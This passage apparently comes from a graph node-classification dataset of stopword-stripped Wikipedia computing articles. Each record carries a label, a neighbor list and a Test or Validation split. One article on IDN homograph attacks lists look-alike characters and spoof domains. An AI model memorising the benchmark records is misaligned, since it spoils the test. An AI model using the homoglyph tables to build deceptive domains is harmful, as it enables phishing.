    "text": "IDN_homograph_attack:idn homograph attack internationalized domain name idn homograph attack way malicious party may deceive computer users remote system communicating exploiting fact many different characters look alike i.e. homographs hence term attack although technically homoglyph accurate term different characters look alike example regular user example.com may lured click link latin character replaced cyrillic character а kind spoofing attack also known script spoofing unicode incorporates numerous writing systems number reasons similar-looking characters greek ο latin cyrillic о assigned code incorrect malicious usage possibility security attacks registration homographic domain names akin typosquatting forms attacks use similar-looking name established domain fool user major difference typosquatting perpetrator attracts victims relying natural human typographical errors manually entering url homograph spoofing perpetrator deceives victims presenting visually indistinguishable hyperlinks indeed would rare accident web user type e.g. cyrillic letter within otherwise english word citibank cases registration typosquatting homograph spoofing pairs l/i i/j 0/o close together keyboards depending typeface may difficult impossible distinguish early nuisance kind pre-dating internet even text terminals confusion l lowercase letter l 1 number one capital letter vowel 0 number zero typewriters pre-computer era even combined ell one users type lowercase l number one needed zero/oh confusion gave rise tradition crossing zeros computer operator would type correctly unicode may contribute greatly combining characters accents several types hyphen-alikes etc. often due inadequate rendering support especially smaller fonts sizes wide variety fonts even earlier handwriting provided rich opportunities confusion notable example etymology word zenith translation arabic samt included scribe confusing ni common medieval blackletter connect vertical columns letters n u making difficult distinguish several row latter well rn rri rn rri confusion still possible human eye even modern advanced computer technology intentional look-alike character substitution different alphabets also known various contexts example faux cyrillic used amusement attention-grabber volapuk encoding cyrillic script represented similar latin characters used early days internet way overcome lack support cyrillic alphabet another example vehicle registration plates cyrillic domestic usage cyrillic script countries latin international driving letters registration plates issued greece limited using letters greek alphabet homoglyphs latin alphabet european union regulations require use latin letters ascii several characters pairs characters look alike known homographs homoglyphs spoofing attacks based similarities known homograph spoofing attacks example 0 number letter l lowercase l uppercase typical example hypothetical attack someone could register domain name appears almost identical existing domain goes somewhere else example domain rnicrosoft.com begins r n examples g00gle.com looks much like google.com fonts using mix uppercase lowercase characters googie.com capital small l looks much like google.com fonts paypal target phishing scam exploiting using domain paypai.com certain narrow-spaced fonts tahoma default address bar windows xp placing c front j l produce homoglyphs cl cj ci g multilingual computer systems different logical characters may identical appearances example unicode character u+0430 cyrillic small letter а look identical unicode character u+0061 latin small letter lowercase used english hence codice_1 cyrillic version instead codice_2 latin version problem arises different treatment characters user mind computer programming viewpoint user cyrillic а within latin string latin difference glyphs characters fonts however computer treats differently processing character string identifier thus user assumption one-to-one correspondence visual appearance name named entity breaks internationalized domain names provide backward-compatible way domain names use full unicode character set standard already widely supported however system expanded character repertoire dozen characters single alphabet many thousands characters many scripts greatly increased scope homograph attacks opens rich vein opportunities phishing varieties fraud attacker could register domain name looks like legitimate website letters replaced homographs another alphabet attacker could send e-mail messages purporting come original site directing people bogus site spoof site could record information passwords account details passing traffic real site victims may never notice difference suspicious criminal activity occurs accounts december 2001 evgeniy gabrilovich alex gontmakher technion israel published paper titled homograph attack described attack used unicode urls spoof website url prove feasibility kind attack researchers successfully registered variant domain name microsoft.com incorporated cyrillic characters problems kind anticipated idn introduced guidelines issued registries try avoid reduce problem example advised registries accept characters latin alphabet country unicode characters advice neglected major tlds february 7 2005 slashdot reported exploit disclosed 3ric johanson hacker conference shmoocon web browsers supporting idna appeared direct url nowiki http //www.pаypal.com/ /nowiki first character replaced cyrillic а site well known payment site paypal actually led spoofed web site different content popular browsers continued problems properly displaying international domain names april 2017 following alphabets characters used spoofing attacks please note obvious common given artistic license much risk spoofer take getting caught possibilities far numerous listed cyrillic far commonly used alphabet homoglyphs largely contains 11 lowercase glyphs identical nearly identical latin counterparts cyrillic letters а с е о р х у optical counterparts basic latin alphabet look close identical c e p x y. cyrillic з ч б resemble numerals 3 4 6 italic type generates homoglyphs дтпи дтпи дтпи standard type resembling dmnu fonts д used since italic form resembles lowercase g however mainstream fonts д instead resembles partial differential sign ∂ capital letters counted авсеніјкморѕтх substitute abcehijkmopstx addition capitals lowercase cyrillic homoglyphs cyrillic non-russian problematic letters і ј j ԛ q ѕ ԝ w ү ғ f ԍ g bear resemblance cyrillic ӓёїӧ also used idn spoofed fake äëïö komi de ԁ shha һ palochka ӏ izhitsa ѵ bear strong resemblance latin h l v letters either rare archaic widely supported standard fonts included wgl-4 attempting use could cause ransom note effect greek alphabet omicron ο sometimes nu ν appear identical latin alphabet letter lowercase used urls fonts italic type feature greek alpha α looking like latin list increases close matches also allowed greek εικηρτυωχγ eiknptuwxy using capital letters list expands greatly greek αβεηικμνορτχυζ looks identical latin abehikmnoptxyz greek αγβεηκμοπρτφχ looks similar cyrillic агвенкмопртфх cyrillic л л greek λ certain geometric sans-serif fonts greek letters κ о look similar cyrillic к о besides greek τ φ similar cyrillic т ф fonts greek δ resembles cyrillic б serbian alphabet cyrillic а also italicizes latin counterpart making possible substitute alpha vice versa lunate form sigma ϲϲ resembles latin cc cyrillic сс idn spoofed greek beta β substitute german esszet ß fonts fact code page 437 treats equivalent greek sigma ς ç accented greek substitutes όίά usually used óíá many fonts last alpha resembling italic type also armenian alphabet contribute critical characters several armenian characters like օ ո ս well capital տ լ often completely identical latin characters modern fonts symbols like ա resemble cyrillic ш. beside symbols look alike ցհոօզս look like ghnoqu յ resembles j albeit dotless ք either resemble p f depending font however use armenian problematic standard fonts feature armenian glyphs whereas greek cyrillic scripts standard fonts windows prior windows 7 rendered armenian distinct font sylfaen supports armenian mixing armenian latin would appear obviously different using font sylfaen unicode typeface known ransom note effect current version tahoma used windows 7 supports armenian previous versions furthermore font differentiates latin g armenian ց two letters armenian ձշ also resemble number 2 յ resembles 3 another վ sometimes resembles number 4 hebrew spoofing generally rare three letters alphabet reliably used samekh ס sometimes resembles vav diacritic וֹ resembles heth ח resembles letter n. less accurate approximants alphanumerics also found usually accurate enough use purposes foreign branding substitution furthermore hebrew alphabet written right left trying mix left-to-right glyphs may cause problems chinese language problematic homographs many characters exist traditional regular script simplified chinese characters .org domain registering one variant renders unavailable anyone .biz single chinese-language idn registration delivers variants active domains must domain name server registrant .hk .香港 also adopts policy unicode scripts homographs found include number forms roman numerals cjk compatibility enclosed cjk letters months certain abbreviations latin certain digraphs currency symbols mathematical alphanumeric symbols alphabetic presentation forms typographic ligatures two names differ accent one character may look similar instance wíkipedia.org wikipedia.org dot first replaced acute accent top-level domain registries wíkipedia.tld xn -- wkipedia-c2a.tld wikipedia.tld two different names may held different registrants one exception .ca reserving plain-ascii version domain prevents another registrant claiming accented version name unicode includes many characters displayed default zero-width space general icann prohibits domain characters registered regardless tld september 2017 security researcher ankit anubhav discovered idn homograph attack attackers registered adoḅe.com deliver betabot trojan simplest defense web browsers support idna similar mechanisms users turn whatever support browsers could mean blocking access idna sites generally browsers permit access display idns punycode either way amounts abandoning non-ascii domain names additional defense internet explorer 7 firefox 2.0 opera 9.10 include phishing filters attempt alert users visit malicious websites.. april 2017 several browsers including chrome firefox opera displaying idns consisting purely cyrillic characters normally punycode allowing spoofing attacks chrome tightened idn restrictions version 59 prevent attack methods defense extend within browser homographic urls house malicious software still distributed without displayed punycode e-mail social networking web sites without detected user actually clicks link fake link show punycode clicked point page already begun loading browser malicious software may already downloaded onto computer television station kboi-tv raised concerns unknown source registering name completely anonymous registered domain name homographic spread april fool day joke regarding governor idaho issuing supposed ban sale music justin bieber icann implemented policy prohibiting potential internationalized tld choosing letters could resemble existing latin tld thus used homograph attacks proposed idn tlds .бг bulgaria .укр ukraine .ελ greece rejected stalled perceived resemblance latin letters three serbian .срб mongolian .мон later accepted three-letter tld considered safer two-letter tld since harder match normal latin iso-3166 country domains although potential match new generic domains remains generic domains far expensive registering second- third-level domain address making cost-prohibitive try register homoglyphic tld sole purpose making fraudulent domains would draw icann scrutiny russian registry operator coordination center tld ru accepts cyrillic names top-level domain .рф forbidding mix latin greek characters however problem .com gtlds remains open",
    "neighbors": [
      2945,
      4163,
      8584,
      10103,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 1140,
    "label": 4,
    "text": "Spoiler_(security_vulnerability):spoiler security vulnerability spoiler security vulnerability modern computer central processing units use speculative execution exploits side-effects speculative execution improve efficiency rowhammer related memory cache attacks according reports modern intel core cpus vulnerable attack amd stated processors vulnerable spoiler issued common vulnerabilities exposures id",
    "neighbors": [
      1024,
      5636,
      4389,
      8815,
      1776,
      2709,
      9435,
      2558,
      575
    ],
    "mask": "None"
  },
  {
    "node_id": 1141,
    "label": 3,
    "text": "PC_Open_Architecture_Developers'_Group:pc open architecture developers group pc open architecture developers group oadg japanese consortium major japanese personal computer manufacturers sponsored ibm 1990s successfully guided japan personal computer manufacturing companies time standardising ibm pc-compatible open architecture advent ibm pc 1981 united states many different varieties designs personal computer examples era include tandy radioshack commodore machines based upon different computer architecture software programs ran compatible machine designed japan except msx situation continued well early 1990s three japan major electronics manufacturers nec sharp fujitsu also designed unique personal computers although nec nec 9801 time successful american computer manufacturer ibm entered japanese market ibm 5550 computer japanese-language-capable computers time however special requirements terms processor capability screen size ibm jx project emphasizing compatibility ibm pc enjoyed limited success whole situation felt many hindering healthy growth japanese computer industry particularly since domestic overseas software vendors develop test support many different software programs run many different kinds personal computers sold japan ibm developed operating software dos/v japan licensed japanese pc manufacturers promote ibm pc architecture dos/v worked ibm sponsored consortium named pc open architecture developers group oadg 1991 made public internal architecture interfaces height enterprise consortium included amongst members major japanese pc manufactures toshiba hitachi overseas manufacturers acer taiwan dell united states together strove develop unified architecture also produced number dos/v-compatible application software programs participated major computer shows time microsoft computer operating system windows 95 arrived 1995 ibm pc architecture using dos/v already predominant force japan 2003 membership included following companies",
    "neighbors": [
      10273,
      8355,
      8900,
      9006,
      9137,
      6419,
      1400,
      3323,
      10749
    ],
    "mask": "None"
  },
  {
    "node_id": 1142,
    "label": 1,
    "text": "Shard_(database_architecture):shard database architecture database shard horizontal partition data database search engine individual partition referred shard database shard shard held separate database server instance spread load data within database remains present shards appears single shard shard server acts single source subset data horizontal partitioning database design principle whereby rows database table held separately rather split columns normalization vertical partitioning differing extents partition forms part shard may turn located separate database server physical location numerous advantages horizontal partitioning approach since tables divided distributed multiple servers total number rows table database reduced reduces index size generally improves search performance database shard placed separate hardware multiple shards placed multiple machines enables distribution database large number machines greatly improving performance addition database shard based real-world segmentation data e.g. european customers v. american customers may possible infer appropriate shard membership easily automatically query relevant shard disadvantages include main section disadvantages practice sharding complex although done long time hand-coding especially rows obvious grouping per example often inflexible desire support sharding automatically terms adding code support identifying candidates sharded separately consistent hashing technique used sharding spread large loads across multiple smaller services servers distributed computing used separate load multiple servers either performance reliability reasons shard approach may also useful horizontal partitioning splits one tables row usually within single instance schema database server may offer advantage reducing index size thus search effort provided obvious robust implicit way identify partition particular row found without first needing search index e.g. classic example 'codice_1 'codice_2 tables zip code already indicates found sharding goes beyond partitions problematic table way across potentially multiple instances schema obvious advantage would search load large partitioned table split across multiple servers logical physical multiple indexes logical server splitting shards across multiple isolated instances requires simple horizontal partitioning hoped-for gains efficiency would lost querying database required instances queried retrieve simple dimension table beyond partitioning sharding thus splits large partitionable tables across servers smaller tables replicated complete units also sharding related shared nothing architecture—once sharded shard live totally separate logical schema instance physical database server data center continent ongoing need retain shared access shards unpartitioned tables shards makes replication across multiple servers easy simple horizontal partitioning also useful worldwide distribution applications communications links data centers would otherwise bottleneck also requirement notification replication mechanism schema instances unpartitioned tables remain closely synchronized application demands complex choice architecture sharded systems approaches range making effectively read-only updates rare batched dynamically replicated tables cost reducing distribution benefits sharding many options sharding database table optimized locally causes premature complexity sharding used options optimization inadequate introduced complexity database sharding causes following potential problems historical complications do-it-yourself sharding addressed independent software vendors provided automatic sharding database context recognize term shard likely derived either one two sources computer corporation america system highly available replicated data utilized redundant hardware facilitate data replication opposed horizontal partitioning critically acclaimed 1997 mmorpg video game ultima online 8 guinness world records designated time one 100 greatest video games produced time richard garriott creator ultima online recollects term coined production phase attempted create self-regulating virtual ecology system whereby players may leverage new internet access revolutionary technology time interact harvest in-game resources although virtual ecology functioned intended in-house testing natural balance failed almost instantaneously due players killing every living wildlife across playable area faster spawning system could operate garriott production team attempted mitigate issue separating global player base separate sessions rewriting part ultima online fictional connection end defeat antagonist mondain also led creation multiverse shards modification provided garriott team fictional basis needed justify creating copies virtual environment however game sharp rise critical acclaim also meant new multiverse virtual ecology system quickly overwhelmed well several months testing garriott team decided abandon feature altogether stripped game functionality today term shard refers deployment use redundant hardware across database systems",
    "neighbors": [
      3328,
      8195,
      7175,
      9225,
      10250,
      3990,
      10518,
      2456,
      1049,
      1178,
      6809,
      11552,
      6433,
      7841,
      9893,
      11178,
      4530,
      6458,
      3004,
      6850,
      3909,
      7499,
      6860,
      333,
      11343,
      337,
      4817,
      7767,
      4696,
      8408,
      2011,
      6124,
      7022,
      9075,
      1142,
      3323,
      4861
    ],
    "mask": "None"
  },
  {
    "node_id": 1143,
    "label": 4,
    "text": "Joanna_Rutkowska:joanna rutkowska joanna rutkowska polish computer security researcher primarily known research low-level security stealth malware founder qubes os security-focused desktop operating system became known security community black hat briefings conference las vegas august 2006 rutkowska presented attack vista kernel protection mechanism also technique dubbed blue pill used hardware virtualization move running os virtual machine subsequently named one five hackers put mark 2006 eweek magazine research topic original concept blue pill published another researcher ieee oakland may 2006 name vmbr following years rutkowska continued focus low-level security 2007 demonstrated certain types hardware-based memory acquisition e.g firewire based unreliable defeated later 2007 together team member alexander tereshkin presented research virtualization malware 2008 rutkowska team focused xen hypervisor security 2009 together team member rafal wojtczuk presented attack intel trusted execution technology intel system management mode april 2007 rutkowska founded invisible things lab warsaw poland company focuses os vmm security research provides various consulting services 2009 blog post coined term evil maid attack detailing method accessing encrypted data disk compromising firmware via external usb flash drive 2010 rafal wojtczuk began working qubes os security-oriented desktop xen distribution utilizes fedora linux initial release qubes 1.0 completed september 3 2012 available free download main concept security compartmentalization using domains implemented lightweight xen virtual machines isolate various subsystems compartment referred qube operates separate hardware level virtual machine project refers reasonably secure operating system received endorsements numerous privacy security experts fairly unique capabilities design informed research proven vulnerabilities trusted compute base tcb unaddressed common desktop operating systems published seminal works systems trustability recently intel x86 considered harmful state considered harmful proposal stateless laptop rutkowska invited esteemed presenter security conferences chaos communication congress black hat briefings hitb rsa conference risk eusecwest gartner security summit",
    "neighbors": [
      2275,
      3495,
      4841,
      6254,
      7983,
      7377,
      6644,
      823,
      4956,
      2558,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 1144,
    "label": 8,
    "text": "Topsite_Templating_System:topsite templating system topsite templating system open source templating system written python programming language designed allow simple melding python code static content apart allowing static content combined python code single file topsite templating system possesses features topsite templating system sometimes informally referred 'topsite possible confusion occur topsite templating system regards common uses term 'topsite warez community site ranking system topsite www known top site list author topsite templating system asserts collision terms purely coincidental avoid confusion suggests topsite templating system cited full form acronym tts term 'topsite",
    "neighbors": [
      8554,
      2804
    ],
    "mask": "None"
  },
  {
    "node_id": 1145,
    "label": 9,
    "text": "Pascal_Script:pascal script pascal script scripting language based programming language pascal facilitates automated runtime control scriptable applications server software implemented free scripting engine includes compiler interpreter byte code pascal script supports majority object pascal constructs making partly compatible delphi free pascal gnu pascal initially developed carlo kok cajscript renamed innerfuse pascal script version 2.23 software taken remobjects renamed remobjects pascal script offered open source software delphi ide beginning version 2.07 cajscript ported free pascal since 2017 pascal script included standard component lazarus ide pascal script used installer scripts inno setup open source setup engine using pascal script may provide additional flexibility installation uninstallation e. g. adding new wizard pages calling dlls providing custom behaviour install conditions pascal script also used server-side scripting pascal server pages maxbox scripter studio inbuild delphi engine renamer batch-oriented automated file renaming tool windows expanded macros written pascal script release version 1.2 lazarus ide began include pascal script engine available form several components additionally lazarus standard packages including synedit tachart support pascal script ide may extended using macros written pascal script increasingly reported applications pascal script science technology include scada robotics education pascal script started 2000 cajscript 1.0 soon superseded cajscript 2.0 later called innerfuse pascal script 2.0 version 2.0 interpreted scripts ran disadvantage every piece code reparsed every time script engine went pascal script 3.0 changed new model compiler runtime completely separated used custom byte code format represent compiled script compiled script contained bare minimum required execute code later carlo kok joined remobjects renamed remobjects pascal script maintained remobjects software fork pascal script maintained sources lazarus ide lazarus free pascal teams ported pascalscript intel processors additional architectures including powerpc arm",
    "neighbors": [
      512,
      9345,
      10506,
      6797,
      6414,
      8082,
      11411,
      6558,
      5663,
      1952,
      428,
      7983,
      9008,
      9780,
      823,
      7479,
      8510,
      8524,
      9714,
      499,
      4341,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 1146,
    "label": 1,
    "text": "Object-relational_database:object-relational database object-relational database ord object-relational database management system ordbms database management system dbms similar relational database object-oriented database model objects classes inheritance directly supported database schemas query language addition pure relational systems supports extension data model custom data types methods object-relational database said provide middle ground relational databases object-oriented databases object-relational databases approach essentially relational databases data resides database manipulated collectively queries query language extreme oodbmses database essentially persistent object store software written object-oriented programming language programming api storing retrieving objects little specific support querying basic need object-relational database arises fact relational object database individual advantages drawbacks isomorphism relational database system mathematical relation allows exploit many useful techniques theorems set theory types databases useful matter comes data complexity mismatch application dbms object oriented database model allows containers like sets lists arbitrary user-defined datatypes well nested objects brings commonality application type systems database type systems removes issue impedance mismatch object databases unlike relational provide mathematical base deep analysis basic goal object-relational database bridge gap relational databases object-oriented modeling techniques used programming languages java c++ visual basic .net c however popular alternative achieving bridge use standard relational database systems form object-relational mapping orm software whereas traditional rdbms sql-dbms products focused efficient management data drawn limited set data-types defined relevant language standards object-relational dbms allows software developers integrate types methods apply dbms ordbms like odbms oodbms integrated object-oriented programming language characteristic properties ordbms 1 complex data 2 type inheritance 3 object behavior complex data creation sql ordbmss based preliminary schema definition via user-defined type udt hierarchy within structured complex data offers additional property type inheritance structured type subtypes reuse attributes contain additional attributes specific subtype another advantage object behavior related access program objects program objects must storable transportable database processing therefore usually named persistent objects inside database relations persistent program object relations object identifier oid points addressed proper relational system although sql standard implementations impose arbitrary restrictions additional complexity object-oriented programming oop object behavior described methods object functions methods denoted one name distinguished type parameters type objects attached method signature oop languages call polymorphism principle briefly defined one interface many implementations oop principles inheritance encapsulation related methods attributes method inheritance included type inheritance encapsulation oop visibility degree declared example codice_1 codice_2 codice_3 access modifiers object-relational database management systems grew research occurred early 1990s research extended existing relational database concepts adding object concepts researchers aimed retain declarative query-language based predicate calculus central component architecture probably notable research project postgres uc berkeley spawned two products tracing lineage research illustra postgresql mid-1990s early commercial products appeared included illustra illustra information systems acquired turn acquired ibm omniscience omniscience corporation acquired oracle corporation became original oracle lite unisql unisql inc. acquired kcoms ukrainian developer ruslan zasukhin founder paradigma software inc. developed shipped first version valentina database mid-1990s c++ sdk next decade postgresql become commercially viable database basis several current products maintain ordbms features computer scientists came refer products object-relational database management systems ordbmss many ideas early object-relational database efforts largely become incorporated sql:1999 via structured types fact product adheres object-oriented aspects sql:1999 could described object-relational database management product example ibm db2 oracle database microsoft sql server make claims support technology varying degrees success rdbms might commonly involve sql statements sql databases allow crafting custom functions would allow query appear object-relational database one might see something like user-defined data-types expressions codice_4 object-relational model offer another advantage database make use relationships data easily collect related records address book application additional table would added ones hold zero addresses customer using traditional rdbms collecting information user address requires join query object-relational database appears simply",
    "neighbors": [
      5632,
      8201,
      2068,
      4630,
      1049,
      5658,
      9248,
      10793,
      5677,
      10286,
      4155,
      11324,
      11327,
      9286,
      2632,
      9290,
      8788,
      10326,
      7767,
      8291,
      9828,
      10340,
      3176,
      8808,
      2669,
      3196,
      2688,
      10389,
      4255,
      1697,
      6822,
      4263,
      10413,
      9397,
      7868,
      11457,
      6850,
      2246,
      2780,
      734,
      10471,
      3821,
      6383,
      7412,
      9467,
      6395,
      8979,
      7446,
      11030,
      5403,
      11552,
      2344,
      6953,
      1341,
      10048,
      2369,
      5953,
      2901,
      10069,
      11098,
      8539,
      9075,
      10632,
      2456,
      9112,
      10137,
      9631,
      10145,
      9634,
      1447,
      7080,
      5051,
      3004,
      9147,
      6085,
      2512,
      10193,
      4056,
      987,
      4065,
      7650,
      6124,
      2544,
      10737
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1147,
    "label": 2,
    "text": "Incompatible_Timesharing_System:incompatible timesharing system incompatible timesharing system time-sharing operating system developed principally mit artificial intelligence laboratory help project mac name jocular complement mit compatible time-sharing system ctss software developed technically influential far beyond core user community remote guest tourist access easily available via early arpanet allowing many interested parties informally try features operating system application programs software environment major influence hacker culture described steven levy book development initiated late 1960s majority mit ai lab staff time disagreed direction taken project mac multics project started mid-1960s particularly decisions inclusion powerful system security name chosen tom knight joke name earliest mit time-sharing operating system compatible time-sharing system dated early 1960s simplifying system compared multics authors able quickly produce functional operating system lab written assembly language originally digital equipment corporation pdp-6 computer majority development use later pdp-10 although used intensively 1986 continued operate mit 1990 1995 stacken computer club sweden introduced many then-new features environment seen users philosophically significantly different provided operating systems time wide-open philosophy collaborative community direct forerunner free open-source software open-design wiki movements emacs editor macros editor originally written instantiation collection teco programs called macros later operating systems written common language systems example c language unix zetalisp lisp machine system gnu ‘ info help system originally emacs subsystem later written complete standalone system unix-like machines several important programming languages systems developed including maclisp precursor zetalisp common lisp microplanner implemented maclisp mdl became basis infocom programming environment scheme among significant influential software subsystems developed macsyma symbolic algebra system probably important terry winograd shrdlu program developed computer game zork also originally written richard greenblatt mac hack vi top-rated chess program years first display graphical board representation default top-level command interpreter pdp-10 machine language debugger ddt usual text editor teco later emacs written teco ddt teco implemented simple dispatch tables single-letter commands thus true syntax task manager called peek local spelling turist artifact six-character filename identifier limitations traceable six sixbit encoded characters fitting single 36-bit pdp-10 word turist may also pun alan turing pioneer theoretical computer science less-complimentary term luser also applied guest users especially repeatedly engaged clueless vandalous behavior jargon file started combined effort people machines mit stanford university sail document described much terminology puns culture two ai labs related research groups direct predecessor hacker dictionary",
    "neighbors": [
      2560,
      6155,
      2062,
      6675,
      7187,
      7188,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      577,
      2625,
      8262,
      1613,
      6221,
      80,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      6772,
      7285,
      4727,
      2168,
      9335,
      634,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      2181,
      9864,
      10891,
      6797,
      10382,
      9871,
      3216,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      4774,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      10937,
      5823,
      8388,
      1736,
      2248,
      10442,
      9932,
      5840,
      6355,
      7382,
      8410,
      9436,
      4830,
      1247,
      11489,
      1253,
      7403,
      5361,
      242,
      5363,
      9466,
      2811,
      9468,
      1278,
      10499,
      2314,
      780,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      8474,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      10547,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      6994,
      7507,
      11601,
      7511,
      10590,
      3426,
      10083,
      8551,
      9067,
      5484,
      7020,
      11635,
      5492,
      2933,
      3446,
      376,
      8573,
      7039,
      4992,
      6529,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      477,
      10730,
      10731,
      8687,
      6128,
      5105,
      5619,
      11255,
      11256,
      5115,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1148,
    "label": 2,
    "text": "Xbox_360_system_software:xbox 360 system software xbox 360 system software xbox 360 dashboard updateable software operating system xbox 360 formerly resided 16 mb file system however starting nxe update storage became requirement rectified either hard drive installed one later revisions console adequate flash storage embedded within console system software access maximum 32 mb system memory otherwise known random access memory updates downloaded xbox live service directly xbox 360 subsequently installed microsoft also provided ability download system software updates respective official xbox website pcs storage media update installed system xbox 360 game system allows users download applications add functionality dashboard apps required user signed valid xbox live gold account order use features advertised given app 2.0.16756.0 update apps require xbox live gold subscription access although app may subscription able use exception early apps microsoft added partners develop apps xbox 360 system since new xbox experience nxe dashboard update 2008 following success xbox one preview program launched 2014 march 2015 microsoft announced xbox 360 preview program public microsoft released xbox 360 console november 22 2005 whole year earlier sony playstation 3 nintendo wii advantage lead microsoft able experiment various customization options consumer ’ individual consoles ability customize way console looked various themes fit front sides something different home console users system xbox 360 dashboard ability multiple profiles password console user able customize dashboard exactly fit unique style premium themes available purchase xbox live marketplace apart default styles originally five tabs sections known blades xbox 360 menu namely marketplace xbox live games media system scrolling left right section would different-colored background signifying unique area users also option change sections one background color well 2008 however gaming scene changed dramatically competitions playstation 3 wii new xbox dashboard titled new xbox experience nxe launched features major changes user interface functionalities new user interface navigation system similar windows media center contained new pop-up/in-game live guide using redesigned version blades interface tabbed interface featured five blades also users able create personalized avatars essentially mini characters furthermore selecting avatar required xbox live service two years later microsoft launched new dashboard set release microsoft kinect adding fresh new user interface touch silver late 2011 system update came complete new user interface metro-style design inspired windows phone many enhancements included update pushed system modernized interface improved features pushed envelope social gaming media xbox 360 console primarily designed play games like video game consoles used media player similar playstation 3 sony xbox 360 media center capabilities built relatively easy set xbox 360 users also copy videos directly hard drive play via usb stick two ways watch videos xbox 360 first download videos xbox live marketplace videos available free others paid microsoft control videos available xbox live marketplace second stream videos windows media center pc using xbox 360 media center extender way users control videos want watch however restrictions kind video playback specifically supports playback dvr-ms mpeg-1 mpeg-2 wmv videos every xbox 360 play dvd movies box using built-in dvd drive additional parts necessary although user may control everything optional remote improvements experience xbox 360 original xbox including ability upscale image look better progressive scan another feature dvd output xbox 360 produces smoother output playing movies televisions support high definition although using dedicated dvd player would offer even features sound quality xbox 360 system software includes built software emulation support original xbox game system software emulation achieved downloadable emulation profiles require hard drive original xbox games supported last reported update compatibility list 2007 support since discontinued adding new titles 400 titles list covers big name titles requirement backwards compatibility users hard drive xbox 360 specifically official microsoft-brand xbox 360 hard drive contrast xbox 360 successor xbox one console backward compatible launch applying november 2015 new xbox one experience system update also supports select group xbox 360 games using software emulator similar xbox 360 backward compatibility feature however also notable differences ways emulations—unlike xbox 360 emulation original xbox xbox one emulation xbox 360 games specifically patched instead need repackaged xbox one format starting nxe dashboard november 2008 larry hryb known xbox live major nelson team members hosted new segment using microsoft connect allow members xbox live community get chance preview next dashboard small bug fixes minor improvements included preview program limited major releases nxe kinect metro released november years 2009 preview program returned august rather november summer update preview program incentive enrollment started either march/april august/september depending major dashboard release planned applicants notified later 2 weeks enrollment date new preview program dashboard launching consoles early 24 hours acceptance preview program invitation users invited friends using invite friends page xbox preview dashboard app friends already program xbox preview dashboard app place preview participants give feedback program get latest news change console enrollment settings report problems users decide n't want get preview updates anymore opt xbox preview dashboard app details preview program located xbox official website first version xbox 360 system software 2.0.1888.0 released november 22 2005 shipped original xbox 360 consoles although version numbered 2.0 available product launch course next years saw continuous updates system software early updates version 2.0.4532.0 released october 31 2006 added supports 1080p video output external hd dvd drive attachment version 2.0.7357.0 released november 19 2008 first major upgrade system software titled new xbox experience added many new features including completely redesigned gui included changes menu system featuring 3d style vibe options sections new sound effects menus notification sounds remain support 1440×900 1680×1050 16:10 resolutions letterboxed vga hdmi using dvi well abilities preview themes setting disable notifications new messages chat requests etc mute notification sound change qwerty keyboard place alphabetical keyboard subsequent system software updates major upgrade continued add although usually numerically smaller new features make changes including bugfixes example new features introduced version 2.0.8498.0 released august 11 2009 addition display discovery allow console override factory settings hdtv resolutions refresh rates well discovering best possible resolution refresh rates hdtv capable displaying selected hdtvs version 2.0.12611.0 released november 1 2010 also added features ability install game updates hdd select games visual refresh incorporate elements microsoft metro design style also featured new boot screen animation redesigned xbox 360 orb ribbons new anti-piracy 2.5 scheme newly released games also added version later updated anti-piracy 2.6 version 2.0.13599.0 released july 19 2011 version 2.0.14699.0 released december 6 2011 introduced redesigned interface fresh new take platform half decade changes enhancements releases version 2.0.16197.0 released october 16 2012 typically minor usually bugfixes mandatory update prepared subsequent growth service system software still constantly updated gaming platforms next generation gaming platforms generation",
    "neighbors": [
      8576,
      2179,
      6787,
      10761,
      4364,
      6797,
      8976,
      3857,
      3477,
      3610,
      5406,
      10273,
      8098,
      9762,
      1067,
      684,
      4908,
      7983,
      321,
      8262,
      9033,
      2380,
      6476,
      9166,
      4305,
      4051,
      9812,
      342,
      6486,
      9434,
      607,
      5600,
      740,
      8423,
      9448,
      8937,
      9194,
      8316,
      8829,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 1149,
    "label": 3,
    "text": "SGI_IndyCam:sgi indycam indycam small fixed-focus camera intended sit top monitor sgi systems sgi originally distributed indy workstation also connect indigo2 video option designed video conferencing thus optimized office landscape bright fluorescent lighting indycam superseded moosecam 02cam indycam continued used among small group sgi hobbyists",
    "neighbors": [
      7234,
      6243,
      5380,
      10051,
      5898,
      6858,
      5356,
      9932,
      7311,
      5523,
      5076,
      3764,
      1398,
      11447,
      5272,
      7001,
      221
    ],
    "mask": "Test"
  },
  {
    "node_id": 1150,
    "label": 2,
    "text": "Live_CD:live cd live cd also live dvd live disc live operating system complete bootable computer installation including operating system runs directly cd-rom similar storage device computer memory rather loading hard disk drive live cd allows users run operating system purpose without installing making changes computer configuration live cds run computer without secondary storage hard disk drive corrupted hard disk drive file system allowing data recovery cd dvd drives steadily phased-out live cds become less popular replaced live usbs equivalent systems written onto usb flash drives added benefit write-able storage functionality live cd also available bootable live usb flash drive external hard disk drive connected usb many live cds offer option persistence writing files hard drive usb flash drive many linux distributions make iso images available burning cd dvd open source operating systems used free commercial software windows go requires license use many live cds used data recovery computer forensics disk imaging system recovery malware removal tails operating system aimed preserving privacy anonymity users allowing work sensitive documents without leaving record computer hard drive computers except earliest digital computers built form minimal built-in loader loads program succession programs storage medium operate computer initially read-only medium punched tape punched cards used initial program load introduction inexpensive read-write storage read-write floppy disks hard disks used boot media introduction audio compact 